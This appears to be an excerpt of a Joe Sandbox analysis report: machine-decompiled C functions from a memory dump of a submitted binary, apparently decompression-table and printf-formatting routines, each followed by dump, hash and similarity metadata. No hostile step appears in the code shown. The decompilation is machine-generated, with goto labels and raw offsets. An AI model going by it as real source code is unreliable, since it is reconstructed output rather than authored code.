                									}
                									break;
                								}
                								_t139 = _t139 - 1;
                								goto L15;
                							}
                							 *(_t201 + _t139 + 0x14) = 0xf;
                							L15:
                							_t139 = _t139 + 1;
                							__eflags = _t139 - 0x14;
                						} while (_t139 < 0x14);
                						_push(0x14);
                						_t190 = _t187 + 0x3c50;
                						_push(_t190);
                						_push(_t201 + 0x1c);
                						E003E3797();
                						_t140 = 0;
                						__eflags = 0;
                						do {
                							__eflags =  *_t186 -  *((intOrPtr*)(_t187 + 0x84)) - 5;
                							if( *_t186 <=  *((intOrPtr*)(_t187 + 0x84)) - 5) {
                								L19:
                								_t92 = E003DA89D(_t186);
                								_t93 =  *(_t190 + 0x84);
                								_t181 = _t92 & 0x0000fffe;
                								__eflags = _t181 -  *((intOrPtr*)(_t190 + 4 + _t93 * 4));
                								if(_t181 >=  *((intOrPtr*)(_t190 + 4 + _t93 * 4))) {
                									_t149 = 0xf;
                									_t94 = _t93 + 1;
                									 *(_t201 + 0x10) = _t149;
                									__eflags = _t94 - _t149;
                									if(_t94 >= _t149) {
                										L27:
                										_t151 =  *(_t186 + 4) +  *(_t201 + 0x10);
                										 *_t186 =  *_t186 + (_t151 >> 3);
                										_t97 =  *(_t201 + 0x10);
                										 *(_t186 + 4) = _t151 & 0x00000007;
                										_t153 = 0x10;
                										_t156 =  *((intOrPtr*)(_t190 + 0x44 + _t97 * 4)) + (_t181 -  *((intOrPtr*)(_t190 + _t97 * 4)) >> _t153 - _t97);
                										__eflags = _t156 -  *_t190;
                										asm("sbb eax, eax");
                										_t98 = _t97 & _t156;
                										__eflags = _t98;
                										_t157 =  *(_t190 + 0xc88 + _t98 * 2) & 0x0000ffff;
                										L28:
                										_t184 = 0x10;
                										__eflags = _t157 - _t184;
                										if(_t157 >= _t184) {
                											_t99 = 0x12;
                											__eflags = _t157 - _t99;
                											if(__eflags >= 0) {
                												_t158 = _t186;
                												if(__eflags != 0) {
                													_t193 = (E003DA898(_t158) >> 9) + 0xb;
                													__eflags = _t193;
                													_push(7);
                												} else {
                													_t193 = (E003DA898(_t158) >> 0xd) + 3;
                													_push(3);
                												}
                												_pop(_t101);
                												E003DA881(_t186, _t101);
                												while(1) {
                													_t193 = _t193 - 1;
                													__eflags = _t140 - 0x194;
                													if(_t140 >= 0x194) {
                														goto L46;
                													}
                													 *(_t201 + _t140 + 0x28) = 0;
                													_t140 = _t140 + 1;
                													__eflags = _t193;
                													if(_t193 != 0) {
                														continue;
                													}
                													L44:
                													_t190 = _t187 + 0x3c50;
                													goto L45;
                												}
                												break;
                											}
                											__eflags = _t157 - _t184;
                											_t167 = _t186;
                											if(_t157 != _t184) {
                												_t198 = (E003DA898(_t167) >> 9) + 0xb;
                												__eflags = _t198;
                												_push(7);
                											} else {
                												_t198 = (E003DA898(_t167) >> 0xd) + 3;
                												_push(3);
                											}
                											_pop(_t121);
                											E003DA881(_t186, _t121);
                											__eflags = _t140;
                											if(_t140 == 0) {
                												goto L47;
                											} else {
                												while(1) {
                													_t198 = _t198 - 1;
                													__eflags = _t140 - 0x194;
                													if(_t140 >= 0x194) {
                														goto L46;
                													}
                													 *(_t201 + _t140 + 0x28) =  *((intOrPtr*)(_t201 + _t140 + 0x27));
                													_t140 = _t140 + 1;
                													__eflags = _t198;
                													if(_t198 != 0) {
                														continue;
                													}
                													goto L44;
                												}
                												break;
                											}
                										}
                										 *(_t201 + _t140 + 0x28) =  *((intOrPtr*)(_t140 + _t187 + 0xe4c8)) + _t157 & 0x0000000f;
                										_t140 = _t140 + 1;
                										goto L45;
                									}
                									_t170 = 4 + _t94 * 4 + _t190;
                									__eflags = _t170;
                									while(1) {
                										__eflags = _t181 -  *_t170;
                										if(_t181 <  *_t170) {
                											break;
                										}
                										_t94 = _t94 + 1;
                										_t170 = _t170 + 4;
                										__eflags = _t94 - 0xf;
                										if(_t94 < 0xf) {
                											continue;
                										}
                										goto L27;
                									}
                									 *(_t201 + 0x10) = _t94;
                									goto L27;
                								}
                								_t171 = 0x10;
                								_t185 = _t181 >> _t171 - _t93;
                								_t174 = ( *(_t185 + _t190 + 0x88) & 0x000000ff) +  *(_t186 + 4);
                								 *_t186 =  *_t186 + (_t174 >> 3);
                								 *(_t186 + 4) = _t174 & 0x00000007;
                								_t157 =  *(_t190 + 0x488 + _t185 * 2) & 0x0000ffff;
                								goto L28;
                							}
                							_t130 = E003E4DC4(_t187);
                							__eflags = _t130;
                							if(_t130 == 0) {
                								goto L47;
                							}
                							goto L19;
                							L45:
                							__eflags = _t140 - 0x194;
                						} while (_t140 < 0x194);
                						L46:
                						 *((char*)(_t187 + 0xe661)) = 1;
                						__eflags =  *_t186 -  *((intOrPtr*)(_t187 + 0x84));
                						if( *_t186 <=  *((intOrPtr*)(_t187 + 0x84))) {
                							_push(0x12b);
                							_push(_t187 + 0xa0);
                							_push(_t201 + 0x30);
                							E003E3797();
                							_push(0x3c);
                							_push(_t187 + 0xf8c);
                							_push(_t201 + 0x15b);
                							E003E3797();
                							_push(0x11);
                							_push(_t187 + 0x1e78);
                							_push(_t201 + 0x197);
                							E003E3797();
                							_push(0x1c);
                							_push(_t187 + 0x2d64);
                							_push(_t201 + 0x1a8);
                							E003E3797();
                							E003F0320(_t187 + 0xe4c8, _t201 + 0x2c, 0x194);
                							return 1;
                						}
                						goto L47;
                					}
                					 *((intOrPtr*)(_t187 + 0xe65c)) = 1;
                					return E003E2F75(_t179, _t205, _t187, _t187 + 0xe4c4);
                				} else {
                					L47:
                					return 0;
                				}
                			}


                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: c3e033f5a90b6653f2820811019e1f3a5f035301b3a61585745d11b019002b2e
                • Instruction ID: c9f4cef8d0a33664ab31349043894c44ee254b69209df7a83654a991c8d94cf4
                • Opcode Fuzzy Hash: c3e033f5a90b6653f2820811019e1f3a5f035301b3a61585745d11b019002b2e
                • Instruction Fuzzy Hash: B5918BB12007998BCB26EE65E894BBA77C4EB58300F100B2DFA968B3C2DA349545D352
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 86%
                			E003E43BF(void* __ecx) {
                				signed int _t70;
                				signed int _t71;
                				signed int _t72;
                				signed int _t75;
                				signed int _t76;
                				signed int _t77;
                				void* _t79;
                				char _t90;
                				signed int _t94;
                				void* _t97;
                				signed int _t108;
                				unsigned int _t112;
                				intOrPtr* _t114;
                				signed int _t117;
                				intOrPtr _t118;
                				signed int _t124;
                				signed int _t127;
                				signed int _t128;
                				signed int _t134;
                				signed int _t136;
                				void* _t138;
                				signed int _t141;
                				void* _t142;
                				intOrPtr* _t143;
                				void* _t147;
                				intOrPtr* _t153;
                				intOrPtr* _t156;
                				void* _t157;
                				signed int _t160;
                				unsigned int _t165;
                				void* _t168;
                				signed int _t169;
                				signed int _t171;
                				signed int _t172;
                				intOrPtr* _t175;
                				void* _t177;
                				void* _t178;
                
                				_t177 = __ecx;
                				if( *((char*)( *((intOrPtr*)(_t178 + 8)) + 0x11)) != 0) {
                					_t175 =  *((intOrPtr*)(_t178 + 0x1dc));
                					__eflags =  *((char*)(_t175 + 8));
                					if( *((char*)(_t175 + 8)) != 0) {
                						L5:
                						_t171 = 0;
                						__eflags = 0;
                						do {
                							_t112 = E003DA898(_t175) >> 0xc;
                							E003DA881(_t175, 4);
                							__eflags = _t112 - 0xf;
                							if(_t112 != 0xf) {
                								 *(_t178 + _t171 + 0x18) = _t112;
                								goto L14;
                							}
                							_t127 = E003DA898(_t175) >> 0x0000000c & 0x000000ff;
                							E003DA881(_t175, 4);
                							__eflags = _t127;
                							if(_t127 != 0) {
                								_t128 = _t127 + 2;
                								__eflags = _t128;
                								while(1) {
                									_t128 = _t128 - 1;
                									__eflags = _t171 - 0x14;
                									if(_t171 >= 0x14) {
                										break;
                									}
                									 *(_t178 + _t171 + 0x18) = 0;
                									_t171 = _t171 + 1;
                									__eflags = _t128;
                									if(_t128 != 0) {
                										continue;
                									}
                									break;
                								}
                								_t171 = _t171 - 1;
                								goto L14;
                							}
                							 *(_t178 + _t171 + 0x18) = 0xf;
                							L14:
                							_t171 = _t171 + 1;
                							__eflags = _t171 - 0x14;
                						} while (_t171 < 0x14);
                						_push(0x14);
                						_t114 =  *((intOrPtr*)(_t178 + 0x1e8)) + 0x3bb0;
                						_push(_t114);
                						_push(_t178 + 0x18);
                						 *((intOrPtr*)(_t178 + 0x20)) = _t114;
                						E003E3797();
                						_t172 = 0;
                						__eflags = 0;
                						do {
                							__eflags =  *((char*)(_t175 + 8));
                							if( *((char*)(_t175 + 8)) != 0) {
                								L19:
                								_t70 = E003DA89D(_t175);
                								_t71 =  *(_t114 + 0x84);
                								_t165 = _t70 & 0x0000fffe;
                								__eflags = _t165 -  *((intOrPtr*)(_t114 + 4 + _t71 * 4));
                								if(_t165 >=  *((intOrPtr*)(_t114 + 4 + _t71 * 4))) {
                									_t134 = 0xf;
                									_t72 = _t71 + 1;
                									 *(_t178 + 0x10) = _t134;
                									__eflags = _t72 - _t134;
                									if(_t72 >= _t134) {
                										L27:
                										_t136 =  *(_t175 + 4) +  *(_t178 + 0x10);
                										 *_t175 =  *_t175 + (_t136 >> 3);
                										_t75 =  *(_t178 + 0x10);
                										 *(_t175 + 4) = _t136 & 0x00000007;
                										_t138 = 0x10;
                										_t141 =  *((intOrPtr*)(_t114 + 0x44 + _t75 * 4)) + (_t165 -  *((intOrPtr*)(_t114 + _t75 * 4)) >> _t138 - _t75);
                										__eflags = _t141 -  *_t114;
                										asm("sbb eax, eax");
                										_t76 = _t75 & _t141;
                										__eflags = _t76;
                										_t77 =  *(_t114 + 0xc88 + _t76 * 2) & 0x0000ffff;
                										L28:
                										_t142 = 0x10;
                										__eflags = _t77 - _t142;
                										if(_t77 >= _t142) {
                											_t168 = 0x12;
                											__eflags = _t77 - _t168;
                											if(__eflags >= 0) {
                												_t143 = _t175;
                												if(__eflags != 0) {
                													_t117 = (E003DA898(_t143) >> 9) + 0xb;
                													__eflags = _t117;
                													_push(7);
                												} else {
                													_t117 = (E003DA898(_t143) >> 0xd) + 3;
                													_push(3);
                												}
                												_pop(_t79);
                												E003DA881(_t175, _t79);
                												while(1) {
                													_t117 = _t117 - 1;
                													__eflags = _t172 - 0x1ae;
                													if(_t172 >= 0x1ae) {
                														goto L46;
                													}
                													 *(_t178 + _t172 + 0x2c) = 0;
                													_t172 = _t172 + 1;
                													__eflags = _t117;
                													if(_t117 != 0) {
                														continue;
                													}
                													L44:
                													_t114 =  *((intOrPtr*)(_t178 + 0x14));
                													goto L45;
                												}
                												break;
                											}
                											__eflags = _t77 - _t142;
                											_t153 = _t175;
                											if(_t77 != _t142) {
                												_t124 = (E003DA898(_t153) >> 9) + 0xb;
                												__eflags = _t124;
                												_push(7);
                											} else {
                												_t124 = (E003DA898(_t153) >> 0xd) + 3;
                												_push(3);
                											}
                											_pop(_t97);
                											E003DA881(_t175, _t97);
                											__eflags = _t172;
                											if(_t172 == 0) {
                												L48:
                												_t90 = 0;
                												L50:
                												return _t90;
                											} else {
                												while(1) {
                													_t124 = _t124 - 1;
                													__eflags = _t172 - 0x1ae;
                													if(_t172 >= 0x1ae) {
                														goto L46;
                													}
                													 *(_t178 + _t172 + 0x2c) =  *((intOrPtr*)(_t178 + _t172 + 0x2b));
                													_t172 = _t172 + 1;
                													__eflags = _t124;
                													if(_t124 != 0) {
                														continue;
                													}
                													goto L44;
                												}
                												break;
                											}
                										}
                										 *(_t178 + _t172 + 0x2c) = _t77;
                										_t172 = _t172 + 1;
                										goto L45;
                									}
                									_t156 = _t114 + (_t72 + 1) * 4;
                									while(1) {
                										__eflags = _t165 -  *_t156;
                										if(_t165 <  *_t156) {
                											break;
                										}
                										_t72 = _t72 + 1;
                										_t156 = _t156 + 4;
                										__eflags = _t72 - 0xf;
                										if(_t72 < 0xf) {
                											continue;
                										}
                										goto L27;
                									}
                									 *(_t178 + 0x10) = _t72;
                									goto L27;
                								}
                								_t157 = 0x10;
                								_t169 = _t165 >> _t157 - _t71;
                								_t160 = ( *(_t169 + _t114 + 0x88) & 0x000000ff) +  *(_t175 + 4);
                								 *_t175 =  *_t175 + (_t160 >> 3);
                								 *(_t175 + 4) = _t160 & 0x00000007;
                								_t77 =  *(_t114 + 0x488 + _t169 * 2) & 0x0000ffff;
                								goto L28;
                							}
                							__eflags =  *_t175 -  *((intOrPtr*)(_t177 + 0x84)) - 5;
                							if( *_t175 <=  *((intOrPtr*)(_t177 + 0x84)) - 5) {
                								goto L19;
                							}
                							_t94 = E003E4E52(_t177);
                							__eflags = _t94;
                							if(_t94 == 0) {
                								goto L48;
                							}
                							goto L19;
                							L45:
                							__eflags = _t172 - 0x1ae;
                						} while (_t172 < 0x1ae);
                						L46:
                						 *((char*)(_t177 + 0xe662)) = 1;
                						__eflags =  *((char*)(_t175 + 8));
                						if( *((char*)(_t175 + 8)) != 0) {
                							L49:
                							_t118 =  *((intOrPtr*)(_t178 + 0x1e8));
                							_push(0x132);
                							_push(_t118);
                							_push(_t178 + 0x2c);
                							E003E3797();
                							_push(0x40);
                							_push(_t118 + 0xeec);
                							_push(_t178 + 0x166);
                							E003E3797();
                							_t147 = 0x10;
                							_push(_t147);
                							_push(_t118 + 0x1dd8);
                							_push(_t178 + 0x1a6);
                							E003E3797();
                							_push(0x2c);
                							_push(_t118 + 0x2cc4);
                							_push(_t178 + 0x1b6);
                							E003E3797();
                							_t90 = 1;
                							goto L50;
                						}
                						__eflags =  *_t175 -  *((intOrPtr*)(_t177 + 0x84));
                						if( *_t175 <=  *((intOrPtr*)(_t177 + 0x84))) {
                							goto L49;
                						}
                						goto L48;
                					}
                					__eflags =  *_t175 -  *((intOrPtr*)(__ecx + 0x84)) - 0x19;
                					if( *_t175 <=  *((intOrPtr*)(__ecx + 0x84)) - 0x19) {
                						goto L5;
                					}
                					_t108 = E003E4E52(__ecx);
                					__eflags = _t108;
                					if(_t108 == 0) {
                						goto L48;
                					}
                					goto L5;
                				}
                				return 1;
                			}

                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 24399a2ad99dde1ffdfe4095f328d7bde986876a5c10afdb0a2a788d37c48f2a
                • Instruction ID: 5237d1f8f0f7ffc53b81ae66aca367bad11803411a04ac17ea096ba31ce3b36b
                • Opcode Fuzzy Hash: 24399a2ad99dde1ffdfe4095f328d7bde986876a5c10afdb0a2a788d37c48f2a
                • Instruction Fuzzy Hash: C6816CB13043D64BDF27DE6AD8C0BBD37D4AB99304F000B2DE9C68B6C2DA7489858752
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 84%
                			E003F51C9(void* __ecx, void* __edi) {
                				signed int _v8;
                				signed int _v12;
                				signed int _v16;
                				void* __ebx;
                				void* __esi;
                				signed int _t52;
                				signed int _t54;
                				signed int _t55;
                				void* _t56;
                				signed int _t57;
                				signed char _t60;
                				signed char _t62;
                				signed int _t64;
                				void* _t65;
                				signed int _t66;
                				signed char _t75;
                				signed char _t78;
                				void* _t86;
                				void* _t88;
                				signed char _t90;
                				signed char _t92;
                				signed int _t93;
                				signed int _t95;
                				signed int _t97;
                				signed int _t98;
                				signed int _t101;
                				void* _t103;
                				signed int _t109;
                				unsigned int _t111;
                				signed char _t113;
                				unsigned int _t121;
                				void* _t122;
                				signed int _t123;
                				short _t124;
                				void* _t127;
                				void* _t128;
                				void* _t129;
                				signed int _t130;
                				void* _t131;
                				void* _t133;
                				void* _t134;
                
                				_t122 = __edi;
                				_t52 =  *0x40e7ac; // 0xc24f6281
                				_v8 = _t52 ^ _t130;
                				_t129 = __ecx;
                				_t101 = 0;
                				_t121 = 0x41;
                				_t54 =  *(__ecx + 0x32) & 0x0000ffff;
                				_t103 = 0x58;
                				_t133 = _t54 - 0x64;
                				if(_t133 > 0) {
                					__eflags = _t54 - 0x70;
                					if(__eflags > 0) {
                						_t55 = _t54 - 0x73;
                						__eflags = _t55;
                						if(_t55 == 0) {
                							L9:
                							_t56 = E003F5BFB(_t129);
                							L10:
                							if(_t56 != 0) {
                								__eflags =  *((intOrPtr*)(_t129 + 0x30)) - _t101;
                								if( *((intOrPtr*)(_t129 + 0x30)) != _t101) {
                									L71:
                									_t57 = 1;
                									L72:
                									return E003EFBBC(_t57, _t101, _v8 ^ _t130, _t121, _t122, _t129);
                								}
                								_t121 =  *(_t129 + 0x20);
                								_push(_t122);
                								_v16 = _t101;
                								_t60 = _t121 >> 4;
                								_v12 = _t101;
                								_t123 = 0x20;
                								__eflags = 1 & _t60;
                								if((1 & _t60) == 0) {
                									L46:
                									_t109 =  *(_t129 + 0x32) & 0x0000ffff;
                									__eflags = _t109 - 0x78;
                									if(_t109 == 0x78) {
                										L48:
                										_t62 = _t121 >> 5;
                										__eflags = _t62 & 0x00000001;
                										if((_t62 & 0x00000001) == 0) {
                											L50:
                											__eflags = 0;
                											L51:
                											__eflags = _t109 - 0x61;
                											if(_t109 == 0x61) {
                												L54:
                												_t64 = 1;
                												L55:
                												_t124 = 0x30;
                												__eflags = _t64;
                												if(_t64 != 0) {
                													L57:
                													_t65 = 0x58;
                													 *((short*)(_t130 + _t101 * 2 - 0xc)) = _t124;
                													__eflags = _t109 - _t65;
                													if(_t109 == _t65) {
                														L60:
                														_t66 = 1;
                														L61:
                														__eflags = _t66;
                														asm("cbw");
                														 *((short*)(_t130 + _t101 * 2 - 0xa)) = ((_t66 & 0xffffff00 | _t66 == 0x00000000) - 0x00000001 & 0x000000e0) + 0x78;
                														_t101 = _t101 + 2;
                														__eflags = _t101;
                														L62:
                														_t127 =  *((intOrPtr*)(_t129 + 0x24)) -  *((intOrPtr*)(_t129 + 0x38)) - _t101;
                														__eflags = _t121 & 0x0000000c;
                														if((_t121 & 0x0000000c) == 0) {
                															E003F4490(_t129 + 0x448, 0x20, _t127, _t129 + 0x18);
                															_t131 = _t131 + 0x10;
                														}
                														E003F5F16(_t129 + 0x448,  &_v16, _t101, _t129 + 0x18,  *((intOrPtr*)(_t129 + 0xc)));
                														_t111 =  *(_t129 + 0x20);
                														_t101 = _t129 + 0x18;
                														_t75 = _t111 >> 3;
                														__eflags = _t75 & 0x00000001;
                														if((_t75 & 0x00000001) != 0) {
                															_t113 = _t111 >> 2;
                															__eflags = _t113 & 0x00000001;
                															if((_t113 & 0x00000001) == 0) {
                																E003F4490(_t129 + 0x448, 0x30, _t127, _t101);
                																_t131 = _t131 + 0x10;
                															}
                														}
                														E003F5DF8(_t129, 0);
                														__eflags =  *_t101;
                														if( *_t101 >= 0) {
                															_t78 =  *(_t129 + 0x20) >> 2;
                															__eflags = _t78 & 0x00000001;
                															if((_t78 & 0x00000001) != 0) {
                																E003F4490(_t129 + 0x448, 0x20, _t127, _t101);
                															}
                														}
                														_pop(_t122);
                														goto L71;
                													}
                													_t86 = 0x41;
                													__eflags = _t109 - _t86;
                													if(_t109 == _t86) {
                														goto L60;
                													}
                													_t66 = 0;
                													goto L61;
                												}
                												__eflags = _t64;
                												if(_t64 == 0) {
                													goto L62;
                												}
                												goto L57;
                											}
                											_t128 = 0x41;
                											__eflags = _t109 - _t128;
                											if(_t109 == _t128) {
                												goto L54;
                											}
                											_t64 = 0;
                											goto L55;
                										}
                										goto L51;
                									}
                									_t88 = 0x58;
                									__eflags = _t109 - _t88;
                									if(_t109 != _t88) {
                										goto L50;
                									}
                									goto L48;
                								}
                								_t90 = _t121 >> 6;
                								__eflags = 1 & _t90;
                								if((1 & _t90) == 0) {
                									__eflags = 1 & _t121;
                									if((1 & _t121) == 0) {
                										_t92 = _t121 >> 1;
                										__eflags = 1 & _t92;
                										if((1 & _t92) == 0) {
                											goto L46;
                										}
                										_v16 = _t123;
                										L45:
                										_t101 = 1;
                										goto L46;
                									}
                									_push(0x2b);
                									L40:
                									_pop(_t93);
                									_v16 = _t93;
                									goto L45;
                								}
                								_push(0x2d);
                								goto L40;
                							}
                							L11:
                							_t57 = 0;
                							goto L72;
                						}
                						_t95 = _t55;
                						__eflags = _t95;
                						if(__eflags == 0) {
                							L28:
                							_push(_t101);
                							_push(0xa);
                							L29:
                							_t56 = E003F5993(_t129, _t122, __eflags);
                							goto L10;
                						}
                						__eflags = _t95 - 3;
                						if(__eflags != 0) {
                							goto L11;
                						}
                						_push(0);
                						L13:
                						_push(0x10);
                						goto L29;
                					}
                					if(__eflags == 0) {
                						_t56 = E003F5B70(__ecx);
                						goto L10;
                					}
                					__eflags = _t54 - 0x67;
                					if(_t54 <= 0x67) {
                						L30:
                						_t56 = E003F56F9(_t101, _t129);
                						goto L10;
                					}
                					__eflags = _t54 - 0x69;
                					if(_t54 == 0x69) {
                						L27:
                						_t3 = _t129 + 0x20;
                						 *_t3 =  *(_t129 + 0x20) | 0x00000010;
                						__eflags =  *_t3;
                						goto L28;
                					}
                					__eflags = _t54 - 0x6e;
                					if(_t54 == 0x6e) {
                						_t56 = E003F5ADD(__ecx, _t121);
                						goto L10;
                					}
                					__eflags = _t54 - 0x6f;
                					if(_t54 != 0x6f) {
                						goto L11;
                					}
                					_t56 = E003F5B51(__ecx);
                					goto L10;
                				}
                				if(_t133 == 0) {
                					goto L27;
                				}
                				_t134 = _t54 - _t103;
                				if(_t134 > 0) {
                					_t97 = _t54 - 0x5a;
                					__eflags = _t97;
                					if(_t97 == 0) {
                						_t56 = E003F553C(__ecx);
                						goto L10;
                					}
                					_t98 = _t97 - 7;
                					__eflags = _t98;
                					if(_t98 == 0) {
                						goto L30;
                					}
                					__eflags = _t98;
                					if(__eflags != 0) {
                						goto L11;
                					}
                					L17:
                					_t56 = E003F58FB(_t129, __eflags, _t101);
                					goto L10;
                				}
                				if(_t134 == 0) {
                					_push(1);
                					goto L13;
                				}
                				if(_t54 == _t121) {
                					goto L30;
                				}
                				if(_t54 == 0x43) {
                					goto L17;
                				}
                				if(_t54 <= 0x44) {
                					goto L11;
                				}
                				if(_t54 <= 0x47) {
                					goto L30;
                				}
                				if(_t54 != 0x53) {
                					goto L11;
                				}
                				goto L9;
                			}

                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 769ac4f03ebc4a92b07d3c7295fee69e14a5c031a01b4390f84e333cf0ffa69d
                • Instruction ID: 62d301a36dbaf3cecf0bde807b6a4d636940972e6de33e8c9680176ca0528f6f
                • Opcode Fuzzy Hash: 769ac4f03ebc4a92b07d3c7295fee69e14a5c031a01b4390f84e333cf0ffa69d
                • Instruction Fuzzy Hash: DC618B35A00F0C77DA3B996C5895BBE2398EB12340F160F2BE783DF682D691DD428251
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 88%
                			E003F4F9A(void* __ecx) {
                				char _v6;
                				char _v8;
                				void* __ebx;
                				void* __edi;
                				char _t49;
                				signed int _t50;
                				void* _t51;
                				signed char _t54;
                				signed char _t56;
                				signed int _t57;
                				signed int _t58;
                				signed char _t67;
                				signed char _t69;
                				signed char _t71;
                				signed char _t80;
                				signed char _t82;
                				signed int _t84;
                				signed int _t86;
                				signed int _t87;
                				signed char _t92;
                				void* _t95;
                				intOrPtr _t100;
                				unsigned int _t102;
                				signed char _t104;
                				void* _t112;
                				unsigned int _t113;
                				void* _t114;
                				signed int _t115;
                				signed int* _t116;
                				void* _t119;
                				void* _t121;
                				void* _t122;
                				void* _t124;
                				void* _t125;
                
                				_push(__ecx);
                				_t119 = __ecx;
                				_t92 = 1;
                				_t49 =  *((char*)(__ecx + 0x31));
                				_t124 = _t49 - 0x64;
                				if(_t124 > 0) {
                					__eflags = _t49 - 0x70;
                					if(__eflags > 0) {
                						_t50 = _t49 - 0x73;
                						__eflags = _t50;
                						if(_t50 == 0) {
                							L9:
                							_t51 = E003F5B88(_t119);
                							L10:
                							if(_t51 != 0) {
                								__eflags =  *((char*)(_t119 + 0x30));
                								if( *((char*)(_t119 + 0x30)) == 0) {
                									_t113 =  *(_t119 + 0x20);
                									_push(_t114);
                									_v8 = 0;
                									_t115 = 0;
                									_v6 = 0;
                									_t54 = _t113 >> 4;
                									__eflags = _t92 & _t54;
                									if((_t92 & _t54) == 0) {
                										L46:
                										_t100 =  *((intOrPtr*)(_t119 + 0x31));
                										__eflags = _t100 - 0x78;
                										if(_t100 == 0x78) {
                											L48:
                											_t56 = _t113 >> 5;
                											__eflags = _t92 & _t56;
                											if((_t92 & _t56) != 0) {
                												L50:
                												__eflags = _t100 - 0x61;
                												if(_t100 == 0x61) {
                													L53:
                													_t57 = 1;
                													L54:
                													__eflags = _t92;
                													if(_t92 != 0) {
                														L56:
                														 *((char*)(_t121 + _t115 - 4)) = 0x30;
                														__eflags = _t100 - 0x58;
                														if(_t100 == 0x58) {
                															L59:
                															_t58 = 1;
                															L60:
                															__eflags = _t58;
                															 *((char*)(_t121 + _t115 - 3)) = ((_t58 & 0xffffff00 | _t58 == 0x00000000) - 0x00000001 & 0x000000e0) + 0x78;
                															_t115 = _t115 + 2;
                															__eflags = _t115;
                															L61:
                															_t95 =  *((intOrPtr*)(_t119 + 0x24)) -  *((intOrPtr*)(_t119 + 0x38)) - _t115;
                															__eflags = _t113 & 0x0000000c;
                															if((_t113 & 0x0000000c) == 0) {
                																E003F4464(_t119 + 0x448, 0x20, _t95, _t119 + 0x18);
                																_t122 = _t122 + 0x10;
                															}
                															E003F5E83(_t119 + 0x448,  &_v8, _t115, _t119 + 0x18,  *((intOrPtr*)(_t119 + 0xc)));
                															_t102 =  *(_t119 + 0x20);
                															_t116 = _t119 + 0x18;
                															_t67 = _t102 >> 3;
                															__eflags = _t67 & 0x00000001;
                															if((_t67 & 0x00000001) != 0) {
                																_t104 = _t102 >> 2;
                																__eflags = _t104 & 0x00000001;
                																if((_t104 & 0x00000001) == 0) {
                																	E003F4464(_t119 + 0x448, 0x30, _t95, _t116);
                																	_t122 = _t122 + 0x10;
                																}
                															}
                															E003F5D51(_t119, _t113, 0);
                															__eflags =  *_t116;
                															if( *_t116 >= 0) {
                																_t71 =  *(_t119 + 0x20) >> 2;
                																__eflags = _t71 & 0x00000001;
                																if((_t71 & 0x00000001) != 0) {
                																	E003F4464(_t119 + 0x448, 0x20, _t95, _t116);
                																}
                															}
                															_t69 = 1;
                															L70:
                															return _t69;
                														}
                														__eflags = _t100 - 0x41;
                														if(_t100 == 0x41) {
                															goto L59;
                														}
                														_t58 = 0;
                														goto L60;
                													}
                													__eflags = _t57;
                													if(_t57 == 0) {
                														goto L61;
                													}
                													goto L56;
                												}
                												__eflags = _t100 - 0x41;
                												if(_t100 == 0x41) {
                													goto L53;
                												}
                												_t57 = 0;
                												goto L54;
                											}
                											L49:
                											_t92 = 0;
                											__eflags = 0;
                											goto L50;
                										}
                										__eflags = _t100 - 0x58;
                										if(_t100 != 0x58) {
                											goto L49;
                										}
                										goto L48;
                									}
                									_t80 = _t113 >> 6;
                									__eflags = _t92 & _t80;
                									if((_t92 & _t80) == 0) {
                										__eflags = _t92 & _t113;
                										if((_t92 & _t113) == 0) {
                											_t82 = _t113 >> 1;
                											__eflags = _t92 & _t82;
                											if((_t92 & _t82) == 0) {
                												goto L46;
                											}
                											_v8 = 0x20;
                											L45:
                											_t115 = _t92;
                											goto L46;
                										}
                										_v8 = 0x2b;
                										goto L45;
                									}
                									_v8 = 0x2d;
                									goto L45;
                								}
                								_t69 = _t92;
                								goto L70;
                							}
                							L11:
                							_t69 = 0;
                							goto L70;
                						}
                						_t84 = _t50;
